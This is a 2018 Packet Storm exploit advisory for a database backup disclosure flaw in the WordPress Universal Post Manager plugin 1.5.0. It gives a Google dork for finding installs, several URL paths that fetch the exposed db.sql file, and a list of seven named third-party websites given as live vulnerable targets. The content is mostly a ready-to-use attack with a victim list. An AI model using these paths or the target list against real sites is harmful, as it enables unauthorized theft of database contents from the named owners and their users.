WordPress Universal Post Manager plugin version 1.5.0 suffers from a database disclosure vulnerability.
156c3c78dbd9ac0c591e268a3c1a8c1986d9b4da507d99c27a39c11d12c7b399#################################################################################################
# Exploit Title : WordPress universal-post-manager 1.5.0 Plugins Database
Backup Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 22/11/2018
# Vendor Homepage : wordpress.org/support/plugin/universal-post-manager/ ~
github.com/WPPlugins/universal-post-manager
+ wpplugindirectory.org/universal-post-manager/ ~
wp-plugins-directory.com/universal-post-manager
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.5.0
# Software Download Link :
github.com/WPPlugins/universal-post-manager/archive/master.zip
# Google Dorks : inurl:''/wp-content/plugins/universal-post-manager/''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
#################################################################################################
# Exploit :
/wp-content/plugins/universal-post-manager/db/db.sql
/PATH/wp-content/plugins/universal-post-manager/db/db.sql
/wpblog/wp-content/plugins/universal-post-manager/db/db.sql
/wordpress/wp-content/plugins/universal-post-manager/db/db.sql
/backups/sitebuild-backup%2010-25-2011/wp-content/plugins/universal-post-manager/db/db.sql
#################################################################################################
# Example Vulnerable Sites =>
[+] unila.ac.id/wp-content/plugins/universal-post-manager/db/db.sql
[+]
foodandwinechickie.com/wp-content/plugins/universal-post-manager/db/db.sql
[+]
imanighana.com/wordpress/wp-content/plugins/universal-post-manager/db/db.sql
[+] fwcnb.org/wpblog/wp-content/plugins/universal-post-manager/db/db.sql
[+]
stumpfsgym.com/wordpress/wp-content/plugins/universal-post-manager/db/db.sql
[+] cc-paysdesainteodile.fr/content/plugins/universal-post-manager/db/db.sql
[+]
sitebuilder.murrayhill.com/backups/sitebuild-backup%2010-25-2011/wp-content/plugins/universal-post-manager/db/db.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed